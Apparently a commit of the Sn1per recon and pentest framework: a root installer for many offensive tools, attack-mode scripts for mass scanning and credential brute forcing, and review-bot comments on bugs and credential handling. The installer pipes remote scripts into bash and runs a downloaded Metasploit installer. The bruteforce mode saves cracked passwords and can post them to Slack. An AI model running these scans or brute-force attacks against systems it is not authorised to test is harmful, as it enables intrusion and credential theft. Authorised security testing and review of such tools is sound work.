echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com $RESET"
echo -e "$OKORANGE + -- --=[ Sn1per CE by @xer0dayz $RESET"
echo ""
INSTALL_DIR=/usr/share/sniper
LOOT_DIR=/usr/share/sniper/loot
PLUGINS_DIR=/usr/share/sniper/plugins
GO_DIR=~/go/bin
echo -e "$OKRED[>]$RESET This script will install Sn1per under $INSTALL_DIR. Are you sure you want to continue? (Hit Ctrl+C to exit)$RESET"
if [[ "$1" != "force" ]]; then
read answer
fi
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
mkdir -p $INSTALL_DIR 2> /dev/null
chmod 755 -Rf $INSTALL_DIR 2> /dev/null
chown root $INSTALL_DIR/sniper 2> /dev/null
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/osint 2> /dev/null
cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
sudo cp -a /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
sudo cp -a /home/$USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /home/kali/.Xauthority /root/.Xauthority 2> /dev/null
sudo chown root: /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority
# CHECK FOR UBUNTU...
UBUNTU_CHECK=$(egrep DISTRIB_ID /etc/lsb-release 2> /dev/null)
if [[ $UBUNTU_CHECK == "DISTRIB_ID=Ubuntu" ]]; then
cp /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
cp -a /run/user/1000/gdm/Xauthority /root/.Xauthority 2> /dev/null
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
chown root /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority 2> /dev/null
snap install chromium 2> /dev/null
ln -s /snap/bin/chromium /usr/bin/chromium 2> /dev/null
xhost + 2> /dev/null
mkdir -p /run/user/0 2> /dev/null
add-apt-repository ppa:longsleep/golang-backports
sudo apt update
apt install golang
fi
echo -e "$OKBLUE[*]$RESET Installing base dependencies...$RESET"
apt install -y sudo gpg curl
echo -e "$OKBLUE[*]$RESET Updating repositories... $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
curl -fsSL https://archive.kali.org/archive-key.asc | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/kali.gpg --yes
echo -e "$OKBLUE[*]$RESET Installing package dependencies...$RESET"
apt update
apt install -y nfs-common
apt install -y nodejs
apt install -y wafw00f
apt install -y xdg-utils
apt install -y ruby
apt install -y rubygems
apt install -y python2
apt install -y python3
apt install -y python3-paramiko
apt purge -y python3-pip
apt install -y python3-pip
apt install -y dos2unix
apt install -y aha
apt install -y libxml2-utils
apt install -y rpcbind
apt install -y cutycapt
apt install -y host
apt install -y whois
apt install -y dnsrecon
apt install -y curl
apt install -y nmap
apt install -y php8.2
apt install -y php8.2-curl
apt install -y hydra
apt install -y sqlmap
apt install -y nbtscan
apt install -y nikto
apt install -y whatweb
apt install -y sslscan
apt install -y jq
apt install -y golang
apt install -y adb
apt install -y xsltproc
apt install -y ldapscripts
apt install -y libssl-dev 2> /dev/null
apt install -y xmlstarlet
apt install -y net-tools
apt install -y p7zip-full
apt install -y jsbeautifier
apt install -y theharvester 2> /dev/null
apt install -y phantomjs 2> /dev/null
apt install -y chromium 2> /dev/null
apt install -y xvfb
apt install -y urlcrazy
apt install -y iputils-ping
apt install -y enum4linux
apt install -y dnsutils
apt install -y wtmpdb
echo -e "$OKBLUE[*]$RESET Installing Metasploit...$RESET"
rm -f /usr/share/keyrings/metasploit-framework.gpg 2> /dev/null
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall
chmod 755 /tmp/msfinstall
/tmp/msfinstall
pip3 install dnspython colorama tldextract urllib3 ipaddress requests --break-system-packages
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
echo -e "$OKBLUE[*]$RESET Installing gem dependencies...$RESET"
gem install rake 2> /dev/null > /dev/null
gem install ruby-nmap 2> /dev/null > /dev/null
gem install net-http-persistent 2> /dev/null > /dev/null
gem install mechanize 2> /dev/null > /dev/null
gem install text-table 2> /dev/null > /dev/null
gem install public_suffix 2> /dev/null > /dev/null
echo -e "$OKBLUE[*]$RESET Setting up Ruby...$RESET"
dpkg-reconfigure ruby
echo -e "$OKBLUE[*]$RESET Upgrading Pip...$RESET"
python3 -m pip install --upgrade pip --break-system-packages
echo -e "$OKBLUE[*]$RESET Cleaning up old extensions...$RESET"
rm -Rf $PLUGINS_DIR 2> /dev/null
mkdir $PLUGINS_DIR 2> /dev/null
cd $PLUGINS_DIR
mkdir -p $GO_DIR 2> /dev/null
echo -e "$OKBLUE[*]$RESET Downloading extensions...$RESET"
# SUBLIST3R INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Sublist3r...$RESET"
git clone https://github.com/1N3/Sublist3r.git
# SHOCKER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shocker...$RESET"
git clone https://github.com/nccgroup/shocker.git
# SSH-AUDIT INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SSH-Audit...$RESET"
git clone https://github.com/arthepsy/ssh-audit
# JEXBOSS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Jexboss...$RESET"
git clone https://github.com/1N3/jexboss.git
# WIG INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Wig...$RESET"
git clone https://github.com/jekyc/wig.git
# CORSTEST INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CORStest...$RESET"
git clone https://github.com/RUB-NDS/CORStest.git
# VULSCAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Vulscan...$RESET"
git clone https://github.com/scipag/vulscan
# METAGOOFIL INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Metagoofil...$RESET"
git clone https://github.com/laramies/metagoofil.git
# SHODAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shodan...$RESET"
git clone https://github.com/achillean/shodan-python
# CMSMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CMSMap...$RESET"
git clone https://github.com/Dionach/CMSmap.git
# SMUGGLER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Smuggler...$RESET"
git clone https://github.com/defparam/smuggler.git
# DIRSEARCH INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Dirsearch...$RESET"
cd $PLUGINS_DIR
rm -Rf dirsearch/ 2> /dev/null
wget https://github.com/maurosoria/dirsearch/archive/refs/tags/v0.4.2.tar.gz
tar -zxvf v0.4.2.tar.gz
mv dirsearch-0.4.2/ dirsearch/
cd dirsearch/
pip3 install -r requirements.txt --break-system-packages
cd $PLUGINS_DIR
# SECRETFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SecretFinder...$RESET"
git clone https://github.com/m4ll0k/SecretFinder.git secretfinder
pip install -r $PLUGINS_DIR/secretfinder/requirements.txt --break-system-packages
# LINKFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing LinkFinder...$RESET"
git clone https://github.com/1N3/LinkFinder
cd LinkFinder
python3 setup.py install
cd ..
# GITGRABER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GitGrabber...$RESET"
git clone https://github.com/hisxo/gitGraber.git
pip3 install -r $PLUGINS_DIR/gitGraber/requirements.txt --break-system-packages 2> /dev/null
# CENSYS-SUBDOMAIN-FINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Censys-Subdomain-Finder...$RESET"
git clone https://github.com/christophetd/censys-subdomain-finder.git
pip3 install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt --break-system-packages
# DNSCAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DNScan...$RESET"
git clone https://github.com/rbsec/dnscan.git
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt --break-system-packages
# ALTDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing AltDNS...$RESET"
git clone https://github.com/infosec-au/altdns.git
cd altdns
pip3 install -r requirements.txt --break-system-packages
python3 setup.py install
pip3 install py-altdns --break-system-packages
cd ..
# MASSDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing MassDNS...$RESET"
git clone https://github.com/blechschmidt/massdns.git
cd massdns
make && make install
cd ..
# DNSGEN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DNSGen...$RESET"
git clone https://github.com/ProjectAnte/dnsgen
cd dnsgen
pip3 install -r requirements.txt --break-system-packages
python3 setup.py install
cd ..
# NUCLEI UPDATES
echo -e "$OKBLUE[*]$RESET Installing Nuclei...$RESET"
GO111MODULE=on go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
ln -fs /root/go/bin/nuclei /usr/local/bin/nuclei 2> /dev/null
nuclei --update
nuclei
# INSTALL WEBTECH
echo -e "$OKBLUE[*]$RESET Installing WebTech...$RESET"
pip3 install -U webtech --break-system-packages
mkdir -p /root/.local/share/webtech
# INSTALL SUBJACK
echo -e "$OKBLUE[*]$RESET Installing SubJack...$RESET"
cd ~/go/bin/;go install github.com/haccer/subjack@latest
# INSTALL SUBOVER
echo -e "$OKBLUE[*]$RESET Installing SubOver...$RESET"
cd ~/go/bin/;go install github.com/Ice3man543/SubOver@latest; mv /root/go/bin/SubOver /usr/local/bin/subover
# INSTALL FPROBE
echo -e "$OKBLUE[*]$RESET Installing FProbe...$RESET"
go install github.com/theblackturtle/fprobe@latest; ln -fs ~/go/bin/fprobe /usr/bin/fprobe
# INSTALL ASNIP
echo -e "$OKBLUE[*]$RESET Installing ASnip...$RESET"
go install github.com/harleo/asnip@latest; ln -fs ~/go/bin/asnip /usr/bin/asnip
# GAU INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GAU...$RESET"
GO111MODULE=on go install github.com/lc/gau@latest
rm -f /usr/bin/gau 2> /dev/null
ln -fs /root/go/bin/gau /usr/bin/gau 2> /dev/null
# INSTALL HTTPX
echo -e "$OKBLUE[*]$RESET Installing HTTPX...$RESET"
go install github.com/projectdiscovery/httpx@latest; ln -fs /root/go/bin/httpx /usr/bin/httpx
# INSTALL FFUF
echo -e "$OKBLUE[*]$RESET Installing FFuF...$RESET"
go install github.com/ffuf/ffuf@latest; ln -fs /root/go/bin/ffuf /usr/bin/ffuf
# GITHUB-ENDPOINTS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Github-Endpoints...$RESET"
go install github.com/gwen001/github-endpoints@latest; ln -fs /root/go/bin/github-endpoints /usr/bin/github-endpoints
# PUREDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing PureDNS...$RESET"
go install github.com/d3mondev/puredns/v2@latest; ln -fs /root/go/bin/puredns /usr/bin/puredns
# AMASS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing AMass...$RESET"
go install -v github.com/OWASP/Amass/v3/...@master
cd /root/go/bin/
# SUBFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SubFinder...$RESET"
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; ln -fs /root/go/bin/subfinder /usr/local/bin/subfinder
# DIRDAR INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DirDar...$RESET"
go install github.com/1N3/dirdar@latest; ln -fs /root/go/bin/dirdar /usr/local/bin/dirdar
# VULNERS NMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Vulners...$RESET"
cd /usr/share/nmap/scripts/
rm -f /usr/share/nmap/scripts/vulners.nse
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
# ensure readable permissions
sudo chmod 644 /usr/share/nmap/scripts/vulners.nse
# update Nmap's script DB so --script-help and autocompletion see it
sudo nmap --script-updatedb
# GOBUSTER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GoBuster...$RESET"
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z -O /tmp/gobuster.7z
cd /tmp/
7z e gobuster.7z
chmod +rx gobuster
mv gobuster /usr/bin/gobuster
# SHODAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shodan...$RESET"
cd $PLUGINS_DIR
cd shodan-python
python setup.py install
cd ..
# H8MAIL INSTALLER
echo -e "$OKBLUE[*]$RESET Installing H8Mail...$RESET"
pip3 install h8mail --break-system-packages 2> /dev/null
# CMSMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CMSMap...$RESET"
cd $PLUGINS_DIR/CMSmap/ && pip3 install . --break-system-packages && python3 setup.py install
cd $PLUGINS_DIR
# ARACHNI MANUAL INSTALL
echo -e "$OKBLUE[*]$RESET Installing Arachni...$RESET"
wget https://github.com/Arachni/arachni/releases/download/v1.5.1/arachni-1.5.1-0.5.12-linux-x86_64.tar.gz -O /tmp/arachni.tar.gz
cd /tmp/
tar -zxf arachni.tar.gz
rm -f /tmp/arachni.tar.gz 2> /dev/null
cd arachni-*
mkdir -p /usr/share/arachni 2> /dev/null
cp -Rf * /usr/share/arachni/ 2> /dev/null
cd /usr/share/arachni/bin/
for a in `ls`; do ln -fs $PWD/$a /usr/bin/$a; done;
# REMOVE CVE TEMPLATES (ALL CVEs GOING FORWARD COVERED BY NUCLEI)
rm -f /usr/share/sniper/templates/active/CVE*
# PHANTOMJS MANUAL INSTALL
echo -e "$OKBLUE[*]$RESET Installing PhantomJS...$RESET"
cd /usr/local/share
wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.7-linux-x86_64.tar.bz2 2> /dev/null
tar xjf phantomjs-1.9.7-linux-x86_64.tar.bz2 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/bin/phantomjs 2> /dev/null
# DNS RESOLVERS DOWNLOAD
echo -e "$OKBLUE[*]$RESET Installing DNS Resolvers...$RESET"
wget https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O /usr/share/sniper/wordlists/resolvers.txt
# THEHARVESTER KALI SETUP
echo -e "$OKBLUE[*]$RESET Installing TheHarvester...$RESET"
cp -f /usr/bin/theHarvester /usr/bin/theharvester 2> /dev/null
# BLACKWIDOW INSTALLER
echo -e "$OKBLUE[*]$RESET Installing BlackWidow...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/BlackWidow
cd $PLUGINS_DIR/BlackWidow/ && bash install.sh force 2> /dev/null
# BRUTEX INSTALLER
echo -e "$OKBLUE[*]$RESET Installing BruteX...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/BruteX.git
cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
# FINDSPLOIT INSTALLER
echo -e "$OKBLUE[*]$RESET Installing FindSploit...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/Findsploit.git
cd $PLUGINS_DIR/Findsploit/ && bash install.sh 2> /dev/null
# GOOHAK INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GooHak...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/Goohak.git
echo -e "$OKBLUE[*]$RESET Setting up environment...$RESET"
cd $INSTALL_DIR
mkdir $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
mkdir $LOOT_DIR/nmap -p 2> /dev/null
mkdir $LOOT_DIR/domains -p 2> /dev/null
mkdir $LOOT_DIR/output -p 2> /dev/null
mkdir $LOOT_DIR/reports -p 2> /dev/null
chmod +x $INSTALL_DIR/sniper
chmod +x $PLUGINS_DIR/Goohak/goohak
rm -f /usr/bin/dirsearch
ln -s $INSTALL_DIR/sniper /usr/bin/sniper 2> /dev/null
ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak 2> /dev/null
ln -s $PLUGINS_DIR/dirsearch/dirsearch.py /usr/bin/dirsearch 2> /dev/null
ln -s /usr/share/sniper /sniper 2> /dev/null
ln -s /usr/share/sniper /usr/share/sn1per 2> /dev/null
ln -s /usr/share/sniper/loot/workspace /workspace 2> /dev/null
ln -s /usr/share/sniper/loot/workspace /root/workspace 2> /dev/null
ln -s /usr/share/sniper /root/sniper 2> /dev/null
ln -s /root/.sniper.conf /usr/share/sniper/conf/sniper.conf 2> /dev/null
ln -s /root/.sniper_api_keys.conf /usr/share/sniper/conf/sniper_api_keys.conf 2> /dev/null
mv /root/.sniper.conf /root/.sniper.conf.bak 2> /dev/null
cp -vf /usr/share/sniper/sniper.conf /root/.sniper.conf 2> /dev/null
msfdb init 2> /dev/null
echo -e "$OKBLUE[*]$RESET Adding start menu and desktop shortcuts... $RESET"
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/applications/ 2> /dev/null
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/applications/sn1per.desktop 2> /dev/null
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/kali-menu/applications/sn1per.desktop 2> /dev/null
cp -f $INSTALL_DIR/sn1per.png /usr/share/pixmaps/ 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/applications/brutex.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/kali-menu/applications/brutex.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/applications/blackwidow.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/kali-menu/applications/blackwidow.desktop 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/applications/findsploit.desktop 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/kali-menu/applications/findsploit.desktop 2> /dev/null
mkdir -p /usr/share/sniper/loot/workspaces/ 2> /dev/null
ln -fs /usr/share/sniper/loot/workspaces/ /home/kali/Desktop/workspaces 2> /dev/null
ln -fs /usr/share/sniper/loot/workspaces/ /root/Desktop/workspaces 2> /dev/null
echo -e "$OKBLUE[*]$RESET Cleaning up installation files... $RESET"
rm -Rf /tmp/arachni* /tmp/gobuster* /tmp/msfinstall /tmp/openssl.cnf 2> /dev/null
echo -e "$OKRED[>]$RESET Done! $RESET"
echo -e "$OKRED[>]$RESET To run, type 'sniper'! $RESET"
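Review bot: the installer and the mode scripts disagree on the workspace path. `mkdir -p /usr/share/sniper/loot/workspaces/` and the two `ln -fs /usr/share/sniper/loot/workspaces/ .../Desktop/workspaces` links use `loot/workspaces`, while the symlinks a few lines earlier (`ln -s /usr/share/sniper/loot/workspace /workspace`) and the mode scripts in this commit (`WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE`) use `loot/workspace`, so the Desktop shortcut points at a directory nothing writes into; pick one spelling. Two smaller points: the `ln -s /root/.sniper.conf ...` / `mv /root/.sniper.conf /root/.sniper.conf.bak` / `cp -vf ... /root/.sniper.conf` sequence replaces the user's config on every install run (the backup is silently overwritten on the second run), and the API-keys symlink is created whether or not `/root/.sniper_api_keys.conf` exists. Since every command here ends in `2> /dev/null`, a failed copy or link leaves no trace; drop the redirect on the config and symlink steps, or check their exit status.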

2
loot/README.md Normal file

@@ -0,0 +1,2 @@
# Sn1per - Automated Pentest Recon Scanner
![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)
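Review bot: loot/README.md carries only the project title and logo. A README inside the loot directory would be more useful if it documented the subdirectory layout the mode scripts in this commit write into (ips/, nmap/, web/, scans/, output/, credentials/, screenshots/) and which files are overwritten per run versus appended forever (scans/tasks.txt and scans/notifications_new.txt only grow).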

85
modes/airstrike.sh Normal file

@@ -0,0 +1,85 @@
# AIRSTRIKE MODE #####################################################################################################
if [[ "$MODE" = "airstrike" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ "$AUTO_BRUTE" = "1" ]]; then
args="$args -b"
fi
if [[ "$FULLNMAPSCAN" = "1" ]]; then
args="$args -fp"
fi
if [[ "$OSINT" = "1" ]]; then
args="$args -o"
fi
if [[ "$RECON" = "1" ]]; then
args="$args -re"
fi
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m stealth --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
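Review bot: in the `-w` branch the per-run bookkeeping and the scan output go to different trees: `WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE` is created (with no `scans/` subdirectory), but `tasks.txt`, `$TARGET-$MODE.txt` and `notifications_new.txt` are still appended under `$LOOT_DIR/scans/`, and the message `Saving loot to $LOOT_DIR` names the directory that is not being created. Either set `LOOT_DIR` to the workspace as discover.sh does, or write the scan records under `$WORKSPACE_DIR`. Two more points: the missing-file check ends in a bare `exit` (status 0), so a cron job or wrapper cannot tell that no scan ran; use `exit 1`. And entries from `$FILE` are used unvalidated as path components (`$LOOT_DIR/scans/$TARGET-$MODE.txt`, `$WORKSPACE_DIR/output/sniper-$TARGET-...`), so a target list containing `../` or whitespace writes outside the loot tree; reject anything outside `[A-Za-z0-9.:_-]` before the loop and quote `"$TARGET"` throughout. The closing "Finished Sn1per scan" notification also reports only the last `$TARGET`, not the list.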

34
modes/bruteforce.sh Normal file

@@ -0,0 +1,34 @@
if [[ "$AUTO_BRUTE" = "1" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/credentials/brutex-$TARGET
cd $INSTALL_DIR
rm -f hydra.restore
rm -f scan.log
CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null)
if [[ ${#CRACKED} -ge 5 ]]; then
echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null
fi
echo ""
rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
else
echo -e "$OKORANGE + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.$RESET"
fi
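Review bot: cracked credentials are handled as ordinary loot here. `brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET` writes the raw output (and later `cracked-$TARGET.txt`) with the default umask, and when `SLACK_NOTIFICATIONS_BRUTEFORCE=1` the whole file is uploaded with `slack.sh postfile`, so working passwords land in a third-party chat history. At minimum `chmod 600` the credentials files (or set a restrictive umask at the top of the script) and post the count of cracked logins rather than the file. Also: the `2> /dev/null` after `tee` silences tee, not brutex, so brutex errors still reach the terminal and the log; and `cd $INSTALL_DIR; rm -f hydra.restore; rm -f scan.log` deletes relative paths, so with `INSTALL_DIR` unset the `cd` lands in `$HOME` and removes whatever `scan.log` happens to be there. Use absolute paths for both.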

78
modes/discover.sh Normal file

@@ -0,0 +1,78 @@
# DISCOVER MODE #####################################################################################################
if [[ "$MODE" = "discover" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
WORKSPACE="$(echo $WORKSPACE | tr / -)"
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
